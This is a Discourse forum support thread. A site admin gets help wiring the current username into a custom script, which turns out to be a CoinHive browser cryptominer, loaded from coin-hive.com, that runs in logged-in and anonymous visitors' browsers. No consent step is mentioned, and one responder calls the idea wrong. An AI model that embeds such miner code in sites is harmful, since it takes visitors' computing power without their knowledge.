Hello,
i will use Discourse.User.currentProp(‘username’) or Discourse.User.currentProp(‘id’) in a design
Insert in Admin / Customize / CSS/HTML / </body>
<scirpt>
alert(Discourse.User.currentProp('username'));
</script>
Hello,
i will use Discourse.User.currentProp(‘username’) or Discourse.User.currentProp(‘id’) in a design
Insert in Admin / Customize / CSS/HTML / </body>
<scirpt>
alert(Discourse.User.currentProp('username'));
</script>
I’m sorry, but what’s your question? Here on Meta, Discourse.User.currentProp('username') evaluates to "fefrei" for me, so this seems to work ![]()
You type it in the Debug Consoel right? That work for me.
But not in this Javascript example.
There i get this error.
Your code is most likely running too early, before Discourse is initialized.
How to fix this (or whether it needs a fix at all) depends on what you’re trying to do. In which context will the JavaScript code needing the username actually run?
I will try this https://coin-hive.com/
i have in the body this…
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>
<script type="text/discourse-plugin" version="0.2">
var miner = new CoinHive.User('<site-key>', 'test', {
threads: 4,
autoThreads: false,
throttle: 0.8,
forceASMJS: false
});
miner.start();
</script>
Then i see how many make the user test. That will i set to the userid or username.
If the user not logged in i will use this
var miner = new CoinHive.Anonymous('<site-key>', {
threads: 4,
autoThreads: false,
throttle: 0.8,
forceASMJS: false
});
In that case, I think the proper way is to use the official plugin API described here:
It has a function to retrieve the current user:
(But I have to add that the idea of mining a cryptocurrency in JavaScript on a web app seems weird and wrong.)
Thanks i it work now ![]()